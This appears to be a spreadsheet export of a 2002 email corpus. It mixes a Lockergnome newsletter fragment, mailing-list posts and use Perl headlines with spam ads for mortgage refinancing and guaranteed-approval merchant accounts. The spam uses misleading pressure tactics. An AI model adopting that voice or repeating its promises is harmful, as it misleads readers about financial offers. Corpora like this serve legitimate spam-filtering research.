 &lt;!-- FEATURE --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeFEATURE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;DreamQuest Championship Card Games&lt;/b&gt;&lt;br&gt;
 For Pocket PC, Palm, Symbian OS&lt;p&gt;
 &lt;a class="url" href="http://www.dq.com/palm.html"&gt;http://www.dq.com/palm.html&lt;/a&gt;&lt;p&gt;
 Playing games on a PDA has killed plenty of my time spent waiting in 
 airports around the US. With the recent porting of these three classic 
 PC card games from DreamQuest, I've added some of the best in PC 
 entertainment to my arsenal of PDA diversions. Hearts, Spades and Euchre 
 all play in a similar manner to their PC versions, only on a smaller 
 screen. Available for Pocket PC, Palm, and even the Symbian OS, you can 
 play cards against computer opponents or connect to the online game room 
 and challenge other players using any of the games multiple platforms. 
 This is a unique experience currently unavailable for any other pocket games. 
 &lt;!-- SKIN --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSKIN&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- http://www.deskmod.com/backend/deskmod/ln.php --&gt;
 &lt;!-- Begin Featured Skin --&gt;
 &lt;span class="author"&gt;&lt;b&gt;Yadnus for &lt;a title="Winamp 2.x  Website" target=_blank HREF="http://www.deskmod.com/?show=showcat&amp;cat_name=winamp2" &gt;Winamp 2.x&lt;/a&gt;&lt;/b&gt; by mc&lt;/span&gt;&lt;br&gt;
 &lt;img height=6 src="images/blank.gif" width=1&gt;
 &lt;font size="1"&gt;Posted on  7/22/02 2:02PM  -- &amp;nbsp;&amp;nbsp; &lt;/font&gt;
 &lt;p align="center"&gt;
 &lt;center&gt;&lt;img BORDER=0 SRC="http://www.deskmod.com/backend/deskmod/lncache/13132.gif" ALT="Winamp 2.x by mc"&gt;&lt;/center&gt;
 &lt;p&gt;&lt;/p&gt;&lt;p align="center"&gt;
 &lt;font size="2"&gt;
 [&lt;a title="Download Yadnus" HREF="http://www.deskmod.com/?download=13132" &gt;Download&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="View Large Image"  target=_blank HREF="http://www.deskmod.com/?state=view&amp;skin_id=13132" &gt;Zoom&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="Visit DeskMod" target=_blank HREF="http://www.deskmod.com" &gt;Visit DeskMod&lt;/a&gt;]
 &lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;!-- End Featured Skin --&gt;
 &lt;p class="url" align="right"&gt;Get your copy of &lt;a href=" https://store.stardock.com/AddProduct.asp?PRODUCT_ID=ESD-SDS-W051&amp;REFERER=lockergnome"&gt;SkinStudio XP&lt;/a&gt;
 &lt;!-- AUDIO --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeAUDIO&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Rexway&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://artists.mp3s.com/artists/56/rexway.html"&gt;http://artists.mp3s.com/artists/56/rexway.html&lt;/a&gt;&lt;p&gt;
 Blending punk rock attitude with country twang makes for a fairly 
 unique musical experience. I saw these guys play a show in Omaha, 
 back in January of this year and was blown away by their stage 
 presence. Rexway rip through an opening set with enough energy to 
 kick-start even the most somber crowd, moving everyone in the 
 audience to their feet and setting the scene for an entertaining 
 evening. As with most punk, the lyrics are equal parts politics 
 and angst, with enough colorful language to drop a jaw or two. 
 Tool fans should check out the countrified version of the classic 
 HWAP; it's kind of like a cover tune, only more unique. If you 
 are offended by 4-letter words, this band isn't for you. 
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Get the privacy of your own office without the promotion.&lt;/b&gt; 
 Keep what you do on your PC private.
 Hide windows instantly, clear cache, cookies, history &amp; more!
 Get a virtual Panic Button for your PC!
 &lt;a href="http://hop.clickbank.net/?lgnome/panicware"&gt;Try it today&lt;/a&gt;!    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;!-- PLUGIN --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomePLUGIN&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;MEXP&lt;/b&gt;&lt;br&gt;
 For Winamp&lt;p&gt;
 &lt;a class="url" href="http://www.mexp.dk"&gt;http://www.mexp.dk&lt;/a&gt;&lt;p&gt;
 If you ever used Mp3 Archive with Winamp, you're already familiar with 
 the concept behind this plug-in. Organize, search, and catalog your 
 music collection. List artists in a tree view, complete with 
 sub-headings for each song or album (depending on personal 
 configuration). Additional details about your song listings appear in 
 the right-hand pane. Also includes an Id3 tag editor, CDDB integration 
 for simplifying tag edits, and Lyrics database support. Try it free for 
 30-days, if you feel more organized, register MEXP for either 14-bucks 
 or 14-Euros. 
 &lt;!-- DVD --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeDVD&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;table align="left" cellpadding="0" cellspacing="8" border="0" valign="top"&gt;&lt;tr&gt;&lt;td align="center"&gt;
 &lt;a href="http://www.amazon.com/exec/obidos/ASIN/B00005NYFS/ref=ase_lockergnomedigit"&gt;&lt;img alt="DVD" border="0" width="94" height="140" src="http://images.lockergnome.com/images/dvd/croupier.jpg"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font style="font-size: 7pt" size="1" color="red" face="Verdana, Tahoma, Arial"&gt;Click for Details&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;b&gt;Croupier&lt;/b&gt; (NR) 1998&lt;br&gt;
 Drama - 94min&lt;br&gt;
 Reviewer's Tilt (9)&lt;p&gt;
 &lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;
 &lt;p class="url"&gt;Special DVD Features worth a look-Deleted scenes&lt;/p&gt;
 In disembodied first person Clockwork style narration,  Croupier
 pessimistically compares our lives to those of hapless casino gamblers.
 We know the odds are stacked against us, yet we continue to play the
 games. Gamblers, or "punters" as they are more derogatorily known,
 however, play their games under the watchful eyes of the croupier
 (casino dealer).  Constantly pulled by the siren song of fast money, the
 croupier knows better than anyone that to play is to lose. Thus, the
 cool croupier relegates himself to his addiction of watching others
 lose. Jack Manfred (Clive Owen) is the croupier, raised by his croupier
 father (Nicholas Ball) who taught him all the tricks of the trade.
 Through his losses both in the casino and in his personal life, Jack's
 father also taught Jack that the only way to win is not to play. Punters
 are sorry sods; the croupier is king. From father to son, the lesson
 passes -- watching others strive and falter is the only real enjoyment
 in life. Despite decades of croupier training, Jack is compelled to
 write the great novel burning deep inside him, yearning to escape.
 Jack's publisher regrettably relates to Jack that his novel idea is
 trite; stories of real life graft and corruption are what sell. When
 Jack's father informs Jack of a casino opening in a small London Casino,
 Jack snatches the opportunity to parlay his skill into a novel exposing
 the seedy underbelly of London's casinos. Unfortunately, Jack's ex-cop
 girlfriend sees the job hardening and irreparably changing Jack for the
 worst. In an attempt to fool himself, Jack creates alter ego "Jake" to
 bear the brunt of inequity, attempting to maintain Jack both morally and
 physically unscathed. The absence of any clear delineation between the
 personas becomes apparent when a lovely punter (Alex Kingston)
 approaches Jack with a scheme to rob the casino. Jack slowly comes to
 the realization that no one can have it both ways, either in the casino
 or in life. You are either in the game, or you are not. Seasoned veteran
 director Michael Hodges deftly crafts this tale around the subtle
 talents of the ultra cool Clive Owen. Owen rules this drama, not with
 flex and volume, but with glances and nods. Less is truly more, much
 more, in this low budget escape from the unsatisfying blockbuster
 suspense films of recent memory. Croupier proves that it is not a large
 budget, but direction, dialogue and acting that drive the genre.
 &lt;ul&gt;
 &lt;li&gt;Region 1 Encoding (US and Canada only)
 &lt;li&gt;Format: Color, Widescreen Anamorphic, Closed Captioned
 &lt;li&gt;Sound: Dolby Digital 2.0 Stereo
 &lt;li&gt;Deleted Scenes
 &lt;/ul&gt;
 &lt;p class="url" align="right"&gt;Review by &lt;a href="mailto:brett@lockergnome.com?subject=DVD Review Feedback"&gt;Brett Trout&lt;/a&gt;
 &lt;!-- WALLPAPER --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeWALLPAPER&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- http://www.deviantart.com/output/lockergnome_newsletter-skin.html --&gt;
 &lt;!-- Begin Featured Skin --&gt;
 &lt;span class="author"&gt;&lt;b&gt;Surgenate for &lt;a title="WallPapers Website" target=_blank HREF="http://www.wincustomize.com" &gt;WallPapers&lt;/a&gt;&lt;/b&gt; by MooShoo&lt;/span&gt;&lt;br&gt;
 &lt;img height=6 src="/images/blank.gif" width=1&gt;
 &lt;font size="1"&gt;Posted on 7/22/2002 12:35:00 AM  -- &amp;nbsp;&amp;nbsp; &lt;/font&gt;
 &lt;p align="center"&gt;&lt;center&gt;
 &lt;img BORDER=0 SRC="http://www.wincustomize.com/library/accounts/MooShoo/wallpapers/tSurgenate.jpg" ALT="Surgenate by MooShoo"&gt;&lt;/center&gt;
 &lt;p&gt;&lt;/p&gt;&lt;p align="center"&gt;
 &lt;font size="2"&gt;
 [&lt;a title="Download Surgenate" HREF="http://www.wincustomize.com/skins.asp?flags=skinid=4035|library=8|file=Surgenate.zip|p=lg" &gt;Download&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="View Large Image"  target=_blank HREF="http://www.wincustomize.com/library/accounts/MooShoo/wallpapers/Surgenate.jpg" &gt;Zoom&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="Visit WinCustomize" target=_blank HREF="http://www.wincustomize.com/skins.asp?library=8&amp;SkinID=4035" &gt;Visit WinCustomize&lt;/a&gt;]
 &lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;!-- End Featured Skin --&gt;
 &lt;!-- ADMINISTRIVIA --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;
 &lt;table bgcolor="#A9C4CF" cellpadding="7" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;a href="http://www.lockergnome.com/issues/digitalmedia/20020722.html"&gt;http://www.lockergnome.com/issues/digitalmedia/20020722.html&lt;/a&gt;&lt;br&gt;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HREF="http://www.gnomedex.com/"&gt;Geekathon 2002&lt;/A&gt;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HREF="http://lockergnome.pricegrabber.com/"&gt;The GnomeSHOPPER&lt;/A&gt;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&amp;nbsp;&lt;a href="http://www.lockergnome.com/recommend.html"&gt;Recommend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href="http://www.lockergnome.com/submit.html"&gt;Submit Your Opinion&lt;/a&gt;&lt;br&gt;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HREF="http://www.amazon.com/exec/obidos/ASIN/0966103254/ref=ase_lockergnome/"&gt;Get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href="mailto:jake@lockergnome.com?subject=Lockergnome Digital Media Comment"&gt;E-mail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&lt;p&gt;&lt;br&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;table border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://www.lockergnome.com/webcam.html"&gt;
 &lt;img width="125" height="94" alt="Lockergnome Webcam Image" src="http://www.lockergnome.com/images/webcam/jakecam.jpg"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;font size="1" face="Tahoma,Arial"&gt;CLICK HERE TO ZOOM&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/font&gt;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class="sidebar"&gt;GNOMEMUSIC&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;table border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://www.netmusiccountdown.com"&gt;
 &lt;img border="0" alt="Net Music Countdown" src="http://images.lockergnome.com/images/nmclogo.gif"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;p&gt;&lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=4l28ge"
 target=_blank&gt;&lt;b&gt;Webasters Protest With The Blues&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Internet radio stations will sing the blues...literally...over music royalty rates, which the operators say are...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1t40no"
 target=_blank&gt;&lt;b&gt;VMAs On Their Way&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 This year's MTV Video Music Awards will be hosted by Saturday Night Live newsman Jimmy Fallon. Bruce Springsteen and...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1s19th"
 target=_blank&gt;&lt;b&gt;Short List Prize's long List&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Beck, the Neptunes and Metallica's Lars Ulrich are all up for this year's Shortlist Music Project. The boys from The...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1y23co"
 target=_blank&gt;&lt;b&gt;Coldplay On Ice?&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 If you're a Coldplay fan, you better not wait too long to buy their latest release, A Rush Of Blood To The Head...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=4l27ge"
 target=_blank&gt;&lt;b&gt;Actor Says Rappers Should Rap, Not Act&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Actor Samuel L. Jackson says he won't even look at a script that turns rap artists into movie stars. He calls the...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1y12p"
 target=_blank&gt;&lt;b&gt;P. Diddy Sued By Songwriters&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Sean "P. Diddy" Combs and his Bad Boy Entertainment are being sued by three songwriters who say they were never paid... 
 &lt;p&gt;&amp;nbsp;&lt;p&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="100%" bgcolor="#FFEEDD"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;GNOMECREDITS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;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&lt;p&gt;&amp;nbsp;&lt;p&gt;&amp;nbsp;Search Past Issues:&lt;br&gt;
 &lt;img src="http://images.lockergnome.com/images/blank.gif"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
 &lt;center&gt;&lt;a href="http://www.gnomedex.com/"&gt;&lt;img src="http://www.lockergnome.com/images/ads/gnomedex_vert.gif" width="125" height="400" border="0"&gt;&lt;/a&gt;&lt;/center&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cops sabotaging their own in car video cameras to avoid looking
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8423193,1717/
 Date: 2002-10-01T08:34:12+01:00
 (katu)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Refinancing, Second Mortgage, Home Improvement                    0
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;div align="center"&gt;
 &lt;center&gt;
 &lt;table cellSpacing="0" cellPadding="1" width="600" border="0"&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td align="middle"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td align="left"&gt;&lt;font face="arial" size="5"&gt;&lt;b&gt;Shop hundreds of
 lenders...&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td align="right"&gt;&lt;font face="arial" size="5"&gt;&lt;b&gt;...with just one click!&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
 &lt;center&gt;
 &lt;table cellSpacing="0" cellPadding="1" width="600" border="0"&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td align="middle"&gt;
 &lt;table cellSpacing="0" cellPadding="2" width="600" border="0"&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td align="left"&gt;&lt;font face="arial" color="red" size="4"&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;Step 1...&lt;/b&gt;&lt;/font&gt;&lt;font face="arial" color="darkblue" size="4"&gt;&amp;nbsp;
 &amp;nbsp;Answer a few questions&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td align="left"&gt;&lt;font face="arial" color="red" size="4"&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;Step 2...&lt;/b&gt;&lt;/font&gt;&lt;font face="arial" color="darkblue" size="4"&gt;&amp;nbsp;
 &amp;nbsp;Lenders compete for your business&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td align="left"&gt;&lt;font face="arial" color="red" size="4"&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;Step 3...&lt;/b&gt;&lt;/font&gt;&lt;font face="arial" color="darkblue" size="4"&gt;&amp;nbsp;
 &amp;nbsp;See how much YOU can save!&amp;nbsp; &amp;nbsp;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
 &lt;center&gt;
 &lt;table cellSpacing="0" cellPadding="1" width="600" bgColor="#eeeeee" border="0"&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td width="40"&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td align="left"&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font face="verdana" color="black" size="3"&gt;&lt;br&gt;
 &lt;marquee scrollDelay="7" border="0" align="middle"&gt;Refinance NOW while
 rates are still low. You could save Hundreds per month!!&lt;/marquee&gt;
 &lt;br&gt;
 There is no obligation and this is a FREE quote!&lt;/p&gt;
 &lt;/font&gt;
 &lt;p align="center"&gt;&lt;/b&gt;&lt;font face="verdana" color="#0000ff" size="4"&gt;
 Debt Consolidation &amp;nbsp; Home Improvement&lt;br&gt;
  Refinancing &amp;nbsp; Second Mortgage&lt;br&gt;
  Equity Line of Credit&lt;/font&gt;&lt;/p&gt;
 &lt;font face="verdana" size="3"&gt;
 &lt;p&gt;&lt;/font&gt;&lt;b&gt;&lt;font face="verdana" color="#800040" size="1"&gt;&amp;nbsp; &lt;/font&gt;&lt;/b&gt;&lt;font face="verdana" color="#0000ff" size="4"&gt;
 &lt;a href="http://www.989888.com/bestrates"&gt;Click
 Here For Short Application&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/div&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font face="verdana"&gt;to be removed from our subscriber list
 &lt;a href="http://www.989888.com/remove"&gt;click
 here&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;23
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-09-24
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 This Week on perl5-porters (16-22 September 2002)
     posted by rafael on Monday September 23, @07:58 (summaries)
     http://use.perl.org/article.pl?sid=02/09/23/125230
 The Great Perl Monger Cull Of 2002
     posted by ziggy on Monday September 23, @16:38 (news)
     http://use.perl.org/article.pl?sid=02/09/23/2041201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</si>
  <si>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Postmortem: Pixelogic's The Italian Job
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613671,159/
 Date: 2002-10-06T18:12:49+01:00
 Armed with a cult film licence and the knowledge that The Italian Job already 
 had a huge fan base in the UK, Pixelogic set out to make a game that would not 
 only do the film justice but would also be a game worth playing.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Now anyone can get a merchant accountBBHNQGHU
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;FONT SIZE=3D"+2" COLOR=3D"#FF0000"&gt;
 &lt;B&gt;&lt;U&gt;&lt;CENTER&gt;NO MONEY Down Merchant  Accounts!&lt;/CENTER&gt;&lt;/U&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR=
 &gt;
 &lt;BR&gt;&lt;b&gt;If you own your own business, you're starting a new business&lt;BR&gt;
 or know someone who is.&lt;FONT SIZE=3D"4"&gt;&lt;B&gt;&lt;I&gt;Being able to accept Major C=
 redit Cards&lt;BR&gt;
 can make all the difference in the world!&lt;/I&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;A href=3D"http://www.interactive-mailing.com/b012/merch"&gt;
 &lt;FONT FACE=3D"Arial" SIZE=3D"5"&gt;&lt;B&gt;Enter Here&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;
 &lt;BR&gt;Just the fact that you accept credit cards adds credibility to&lt;BR&gt;
 your business. Especially if you are a New, Small or Home Based Business.&lt;=
 BR&gt;&lt;BR&gt;
 &lt;FONT SIZE=3D"5" COLOR=3D"#FF8000"&gt;&lt;B&gt;&lt;I&gt;No Payment For The First  Month&lt;/=
 I&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;UL TYPE=3D"DISC"&gt;&lt;LI&gt;Setup within 3-5 Days&lt;LI&gt;Approval is quick and our s=
 et  up times range from 3-5 days.
 &lt;LI&gt;Guaranteed approval on all leases for equipment or software.
 &lt;BR&gt;Bad credit, no credit, no problem!&lt;LI&gt;ACCEPT CREDIT CARDS ONLINE or OF=
 FLINE !!
 &lt;/UL&gt;
 &lt;A href=3D"http://www.interactive-mailing.com/b012/merch"&gt;&lt;FONT face=3DAri=
 al
 size=3D5&gt;&lt;STRONG&gt;&lt;EM&gt;Enter Here&lt;/EM&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/B&gt;&lt;/I&gt;&lt;BR&gt;&lt;BR&gt;&lt;B=
 R&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT face=3DVerdana size=3D1&gt;&amp;quot;=
 We search for the best offering's for&lt;br&gt;you; we do the research and you g=
 et only The superior&amp;quot; results&lt;br&gt;
 this  email is brought to you by; TMC. . To abolish&lt;br&gt;all future notices,=
  please &lt;A HREF=3D"http://www.interactive-mailing.com/b012/"&gt;Enter here&lt;/A=
 &gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] bind + lex + yacc...
</t>
  </si>
  <si>
    <t xml:space="preserve">Never having to support a large network myself, I know very little about
 this..
 but what do lex &amp; yacc have to do with anything ?
 These are language parsers, used to build complilers / interptreters  and
 the like???!!!
 BIND, ok large networks might need DNS....
 Have I missed something completely?
 J
 &gt; -----Original Message-----
 &gt; From: ilug-admin@linux.ie [mailto:ilug-admin@linux.ie]On Behalf Of kevin
 &gt; lyda
 &gt; Sent: Monday, July 22, 2002 3:39 PM
 &gt; To: irish linux users group
 &gt; Subject: [ILUG] bind + lex + yacc...
 &gt;
 &gt;
 &gt; i recently received this email from a friend of mine in the states:
 &gt;
 &gt;     i'm trying to figure out how to maintain about 200 domains, with a
 &gt;     hundred or so computers per domain.  some internal, some external.
 &gt;     i recently learned lex and yacc and i'm thinking that's the way to go.
 &gt;     i don't really know perl and i know it's useful but i think i can
 &gt;     write c faster then perl.
 &gt;
 &gt;     is this a good idea?
 &gt;
 &gt;     ps  we're really busy.
 &gt;
 &gt; obviously as a stupid developer with no real admin experience to speak
 &gt; of, i'm not qualified to answer this question.  does anyone with real
 &gt; admin experience have any suggestions here?  the problem sounds really
 &gt; hard, and i doubt anyone has had to deal with this level of complexity
 &gt; so there probably aren't any existing tools written.
 &gt;
 &gt; anyone else have any opinions or experience i could pass on?
 &gt;
 &gt; kevin
 &gt;
 &gt; --
 &gt; kevin@suberic.net     that a believer is happier than a skeptic
 &gt; is no more to
 &gt; fork()'ed on 37058400    the point than the fact that a drunken
 &gt; man is happier
 &gt; meatspace place: home       than a sober one. the happiness of
 &gt; credulity is a
 &gt; http://ie.suberic.net/~kevin   cheap &amp; dangerous quality -- g.b. shaw
 &gt;
 &gt; --
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
 &gt; information.
 &gt; List maintainer: listmaster@linux.ie
 &gt;
 &gt;
 &gt;
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: LIE`S, MIS-INFORMATION and FRAUD
</t>
  </si>
  <si>
    <t xml:space="preserve">On 19 Jul 2002, Karl Anderson wrote:
 &gt; "Adam L. Beberg" &lt;beberg@mithral.com&gt; writes:
 &gt;
 &gt; &gt; Possibly replace "own" with "take from you ASAP with dilution". Their goal
 &gt; &gt; is to take what you have by any means nessecary and sell it to someone else
 &gt; &gt; for more then they paid within 7 years or less. That's what they do, nice
 &gt; &gt; and simple. Your based-on-GPL-thing gives them no way to do that, so you are
 &gt; &gt; irrelivant to the VC/investment world.
 &gt;
 &gt; Interestingly, it was the VC that convinced Zope Corp. to go opensource.
 But wasnt that before they realized that Open Source(TM) ment they couldnt
 control it? There was a time when VC love was all over Open Source(TM) as a
 revenue model.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] OT: Can Weblogs Reach Ronald Scelson?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_02F4_01C2443E.80476960
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 Made me chuckle.
 http://www.bloggerheads.com/can_weblogs/ronald_scelson.asp
 rOD.
 --
 "Don't frown, don't pout, don't snivel, don't cry,
  Don't cough, don't choke, don't faint, don't die."
 &gt;&gt; Doing the blogging thang again at http://www.groovymother.com/ &lt;&lt;
 ------=_NextPart_000_02F4_01C2443E.80476960
 Content-Type: application/x-pkcs7-signature;
 	name="smime.p7s"
 Content-Transfer-Encoding: base64
 Content-Disposition: attachment;
 	filename="smime.p7s"
 MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIJIjCCAnow
